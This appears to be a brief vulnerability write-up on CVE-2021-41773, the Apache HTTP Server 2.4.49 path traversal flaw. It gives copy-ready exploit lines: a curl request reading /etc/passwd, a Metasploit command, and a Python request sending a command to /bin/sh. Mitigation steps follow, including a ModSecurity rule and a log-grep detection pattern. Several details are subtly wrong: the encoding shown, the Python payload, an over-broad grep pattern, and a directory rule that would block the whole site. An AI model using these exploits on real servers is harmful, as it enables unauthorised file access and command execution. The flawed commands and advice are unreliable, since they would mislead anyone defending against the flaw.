How CVE-2021-41773 Works
A flaw in Apache HTTP Server 2.4.49 allows attackers to exploit path traversal via URL-encoded directory traversal sequences. The vulnerability arises due to improper input validation in the `ap_normalize_path()` function, which fails to block malicious paths like /icons/.%%32%65. This lets attackers bypass security checks and access restricted files. If `mod_cgi` is enabled, remote code execution (RCE) becomes possible by sending crafted requests, allowing attackers to execute arbitrary commands on the server.
DailyCVE Form
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal → RCE
Severity: Critical
Date: 2021-10-05
What Undercode Say:
Exploitation:
1. Manual Exploit (curl):
curl -v "http://target.com/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"
2. Metasploit Module:
use auxiliary/scanner/http/apache_normalize_path set RHOSTS target.com run
3. Python Exploit:
import requests
url = "http://target.com/cgi-bin/.%252e/.%252e/.%252e/.%252e/bin/sh"
data = {"cmd": "id"}
requests.post(url, data=data)
Mitigation:
1. Patch Immediately:
sudo apt update && sudo apt upgrade apache2
2. Disable `mod_cgi` if unused:
LoadModule cgi_module modules/mod_cgi.so → Comment out
3. WAF Rules (ModSecurity):
SecRule REQUEST_URI "@contains %2e" "deny,log,id:1001"
4. Restrict Directory Access:
<Directory "/var/www/html"> Require all denied </Directory>
5. Log Monitoring (Detect Attacks):
grep -E '%2e|..' /var/log/apache2/access.log
Impact Analysis:
- CVSS Score: 9.8 (Critical)
- Attack Vector: Network-based, no auth required.
- Affected Configs: Default installs with `mod_cgi` enabled.
References:
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode
